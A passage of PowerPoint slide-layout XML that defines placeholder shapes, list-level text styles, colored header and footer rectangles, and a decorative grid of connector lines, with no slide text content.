            <a:off x="456245" y="1704685"/>
            <a:ext cx="4038600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1704685"/>
            <a:ext cx="4038600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75" name="Shape 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728" cy="1161900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Shape 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="-13" y="-12188"/>
              <a:ext cx="187800" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AB0101"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Shape 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="187715" y="-12188"/>
              <a:ext cx="7818000" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F243E"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="134801"/>
            <a:ext cx="7315500" cy="1351800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>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79" name="Shape 79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728" cy="1161900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Shape 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="-13" y="-12188"/>
              <a:ext cx="187800" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AB0101"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Shape 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="187715" y="-12188"/>
              <a:ext cx="7818000" cy="1161900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F243E"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="134801"/>
            <a:ext cx="7315500" cy="1351800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>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84" name="Shape 84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8964666" y="6165015"/>
            <a:ext cx="187800" cy="695100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AB0101"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3866778" y="6165015"/>
            <a:ext cx="5097900" cy="695100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F243E"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3866813" y="6165015"/>
            <a:ext cx="5097900" cy="695100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="14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8" name="Shape 8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Shape 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="33868" y="-94"/>
            <a:ext cx="3409813" cy="2810236"/>
            <a:chOff x="0" y="1494"/>
            <a:chExt cx="3409813" cy="2810236"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Shape 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="245543"/>
              <a:ext cx="32511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8" name="Shape 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-1212177" y="1407880"/>
              <a:ext cx="2806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9" name="Shape 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="474143"/>
              <a:ext cx="26670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0" name="Shape 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="702743"/>
              <a:ext cx="2167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1" name="Shape 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="931343"/>
              <a:ext cx="18627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2" name="Shape 12"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1159943"/>
              <a:ext cx="14901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3" name="Shape 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1388543"/>
              <a:ext cx="1219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4" name="Shape 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1617143"/>
              <a:ext cx="9906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5" name="Shape 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1845743"/>
              <a:ext cx="745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6" name="Shape 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2074343"/>
              <a:ext cx="5334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7" name="Shape 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2302944"/>
              <a:ext cx="262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8" name="Shape 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-814261" y="1238115"/>
              <a:ext cx="24684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9" name="Shape 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-357712" y="1014528"/>
              <a:ext cx="20181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0" name="Shape 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-853" y="887577"/>
              <a:ext cx="17640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1" name="Shape 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="326307" y="790194"/>
              <a:ext cx="15693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2" name="Shape 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="636517" y="709727"/>
              <a:ext cx="1408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3" name="Shape 23"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="972229" y="603962"/>
              <a:ext cx="11967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4" name="Shape 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1278237" y="527761"/>
              <a:ext cx="10443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5" name="Shape 25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1590398" y="440777"/>
              <a:ext cx="8796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6" name="Shape 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1883657" y="377227"/>
              <a:ext cx="7527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7" name="Shape 27"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2198067" y="292494"/>
              <a:ext cx="583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8" name="Shape 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2521028" y="199377"/>
              <a:ext cx="397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9" name="Shape 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2801688" y="148627"/>
              <a:ext cx="295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0" name="Shape 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="3079243" y="102444"/>
              <a:ext cx="2016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1" name="Shape 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="3324763" y="85077"/>
              <a:ext cx="168600" cy="1500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:srgbClr val="B7CCE4">
                  <a:alpha val="53725"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
